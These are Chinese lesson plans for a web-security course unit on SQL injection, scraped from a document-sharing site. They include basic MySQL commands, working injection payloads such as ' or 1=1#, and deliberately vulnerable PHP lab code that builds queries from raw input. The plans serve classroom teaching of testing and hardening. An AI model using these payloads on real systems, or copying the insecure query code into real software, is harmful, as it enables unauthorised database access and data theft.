任務(wù)2.5SQL注入漏洞(一)教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解SQL注入漏洞的基本概念、危害,分類2.理解SQL注入漏洞的測(cè)試流程、測(cè)試字符串3.掌握數(shù)據(jù)庫(kù)的基本操作4.掌握手工注入&工具注入5.掌握SQL注入漏洞的利用與加固能力目標(biāo):1.能利用SQL注入漏洞獲取目標(biāo)靶機(jī)數(shù)據(jù)情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)SQL注入測(cè)試字符串教學(xué)難點(diǎn)SQL注入測(cè)試字符串教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/5/8授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容測(cè)試登陸后臺(tái)是否有sql注入漏洞利用萬(wàn)能密碼登陸后臺(tái)管理系統(tǒng)練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次19課程類型理論項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.5SQL注入漏洞(二)教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解SQL注入漏洞的基本概念、危害,分類2.理解SQL注入漏洞的測(cè)試流程、測(cè)試字符串3.掌握數(shù)據(jù)庫(kù)的基本操作4.掌握手工注入&工具注入5.掌握SQL注入漏洞的利用與加固能力目標(biāo):1.能利用SQL注入漏洞獲取目標(biāo)靶機(jī)數(shù)據(jù)情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)數(shù)據(jù)庫(kù)的基本操作SQL注入分類教學(xué)難點(diǎn)數(shù)據(jù)庫(kù)的基本操作SQL注入分類教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/5/10授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容2.1數(shù)據(jù)庫(kù)概念數(shù)據(jù)庫(kù):長(zhǎng)期儲(chǔ)存在計(jì)算機(jī)內(nèi)的,有組織的,可共享的數(shù)據(jù)集合。DMBS:如何組織和存儲(chǔ)數(shù)據(jù)庫(kù)中的數(shù)據(jù),如何有效地獲取和維護(hù)這些數(shù)據(jù)。完成這個(gè)任務(wù)的程序(軟件)叫數(shù)據(jù)庫(kù)管理系統(tǒng)(DataBaseManagementSystem:DMBS)2.2常用的數(shù)據(jù)庫(kù)mysql,oracle,SQLServer等2.3常用的數(shù)據(jù)庫(kù)結(jié)構(gòu)庫(kù)->表->字段,采用結(jié)構(gòu)化查詢語(yǔ)言(SQL)select列名稱1,列名稱2from表名稱deletefrom表名稱where列名稱=值update表名稱set列名稱=新值where列名稱=某值insertinto表名(列1,列2,……)values(值1,值2,……)2.2常用的數(shù)據(jù)庫(kù)mysql,oracle,SQLServer等2.3常用的數(shù)據(jù)庫(kù)結(jié)構(gòu)庫(kù)->表->字段,采用結(jié)構(gòu)化查詢語(yǔ)言(SQL)2.4常用的數(shù)據(jù)庫(kù)操作登錄數(shù)據(jù)庫(kù):mysql–uroot–p****顯示數(shù)據(jù)庫(kù):showdatabases;使用數(shù)據(jù)庫(kù):use數(shù)據(jù)庫(kù)名;顯示表名稱:showtables;查看表的字段:desc表名稱;select列名稱1,列名稱2from表名稱查詢數(shù)據(jù)庫(kù):selectdatabase();查詢用戶:selectuser();查詢版本:selectversion()deletefrom表名稱where列名稱=值update表名稱set列名稱=新值where列名稱=某值insertinto表名(列1,列2,……)values(值1,值2,……)根據(jù)注入點(diǎn)類型不同,分為(1)整數(shù)型user_id=$id(2)字符型user_id=’$id’(3)搜索型textlike“%{$_GET[‘search’]}%”(4)其他類型不管是那種類型的注入的,總而言之,就是對(duì)sql中的各種類型的輸入進(jìn)行閉合測(cè)試,構(gòu)造合法的sql,欺騙后臺(tái)的執(zhí)行。只要我們猜測(cè)后臺(tái)的語(yǔ)句是怎么來(lái)拼接的,然后去構(gòu)造閉合。練習(xí)與作業(yè)數(shù)字型,字符型sql注入課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次20課程類型實(shí)踐項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.5SQL注入漏洞(二)教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解SQL注入漏洞的基本概念、危害,分類2.理解SQL注入漏洞的測(cè)試流程、測(cè)試字符串3.掌握數(shù)據(jù)庫(kù)的基本操作4.掌握手工注入&工具注入5.掌握SQL注入漏洞的利用與加固能力目標(biāo):1.能利用SQL注入漏洞獲取目標(biāo)靶機(jī)數(shù)據(jù)情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)數(shù)據(jù)庫(kù)的基本操作SQL注入分類教學(xué)難點(diǎn)數(shù)據(jù)庫(kù)的基本操作SQL注入分類教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/5/10授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.數(shù)字型post注入從返回的結(jié)果我們可以猜測(cè)一下數(shù)據(jù)庫(kù)的查詢語(yǔ)句$id=$_POST[‘id’]Select字段1(姓名),字段2(郵箱)from表名whereid=$iddescmember;查看表member字段。抓包,發(fā)送到repeter,構(gòu)造payload,or1=1后端的代碼分析sqli-id.phpif(isset($_POST['submit'])&&$_POST['id']!=null){
//這里沒(méi)有做任何處理,直接拼到select里面去了,形成Sql注入
$id=$_POST['id'];
$query="selectusername,emailfrommemberwhereid=$id";
$result=execute($link,$query);
//這里如果用==1,會(huì)嚴(yán)格一點(diǎn)
if(mysqli_num_rows($result)>=1){
while($data=mysqli_fetch_assoc($result)){
$username=$data['username'];
$email=$data['email'];
$html.="<pclass='notice'>hello,{$username}<br/>youremailis:{$email}</p>";
}
}else{
$html.="<pclass='notice'>您輸入的userid不存在,請(qǐng)重新輸入!</p>";
}
}分析得出:構(gòu)造payloador1=12.字符型注入輸入一個(gè)名字:正確的如kobe,不正確的字符串如111,我們猜想后臺(tái)是怎么來(lái)運(yùn)行的。$username=$_GET[‘username’]Select字段1,字段2,from表名whereusername(猜想的)=’kobe’構(gòu)造payload:kobe’or1=1##作用是注釋后面的sql語(yǔ)句及查詢語(yǔ)句就是:Select字段1,字段2,from表名whereusername(猜想的)=’kobe’or1=1#’查看一下源代碼:sql-str.phpif(isset($_GET['submit'])&&$_GET['name']!=null){
//這里沒(méi)有做任何處理,直接拼到select里面去了
$name=$_GET['name'];
//這里的變量是字符型,需要考慮閉合
$query="selectid,emailfrommemberwhereusername='$name'";
$result=execute($link,$query);
if(mysqli_num_rows($result)>=1){
while($data=mysqli_fetch_assoc($result)){
$id=$data['id'];
$email=$data['email'];
$html.="<pclass='notice'>youruid:{$id}<br/>youremailis:{$email}</p>";
}
}else{
$html.="<pclass='notice'>您輸入的username不存在,請(qǐng)重新輸入!</p>";
}
}3.搜索型注入猜想:select*frommemberwhereusernamelike'%k%';構(gòu)造我們的payload:xx%'or1=1#源碼分析:sqli-search.phpif(isset($_GET['submit'])&&$_GET['name']!=null){
//這里沒(méi)有做任何處理,直接拼到select里面去了
$name=$_GET['name'];
//這里的變量是模糊匹配,需要考慮閉合
$query="selectusername,id,emailfrommemberwhereusernamelike'%$name%'";
$result=execute($link,$query);
if(mysqli_num_rows($result)>=1){
//彩蛋:這里還有個(gè)xss
$html2.="<pclass='notice'>用戶名中含有{$_GET['name']}的結(jié)果如下:<br/>";
while($data=mysqli_fetch_assoc($result)){
$uname=$data['username'];
$id=$data['id'];
$email=$data['email'];
$html1.="<pclass='notice'>username:{$uname}<br/>uid:{$id}<br/>emailis:{$ema
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 勞動(dòng)合同勞務(wù)合同范例
- 公司合并協(xié)議合同范本
- 全職合同范本
- 醫(yī)院物業(yè)招聘合同范本
- 加盟快遞押金合同范本
- 單位電線更換維修合同范本
- 聲學(xué)顧問(wèn)合同范本
- 單位車棚工程合同范本
- cpvc管購(gòu)買合同范本
- ul認(rèn)證合同范本
- 2025電力物資檢儲(chǔ)配一體化建設(shè)技術(shù)導(dǎo)則
- 新學(xué)期 開學(xué)第一課 主題班會(huì)課件
- 民法典合同編講座
- 2024年青島港灣職業(yè)技術(shù)學(xué)院高職單招語(yǔ)文歷年參考題庫(kù)含答案解析
- 廣西壯族自治區(qū)公路發(fā)展中心2025年面向社會(huì)公開招聘657名工作人員高頻重點(diǎn)提升(共500題)附帶答案詳解
- 大學(xué)轉(zhuǎn)專業(yè)高等數(shù)學(xué)試卷
- DBJ51-T 198-2022 四川省既有民用建筑結(jié)構(gòu)安全隱患排查技術(shù)標(biāo)準(zhǔn)
- 公司廠區(qū)保潔培訓(xùn)
- 江蘇省招標(biāo)中心有限公司招聘筆試沖刺題2025
- 2024年防盜門銷售合同范本
- 支付令申請(qǐng)書(2025版)
評(píng)論
0/150
提交評(píng)論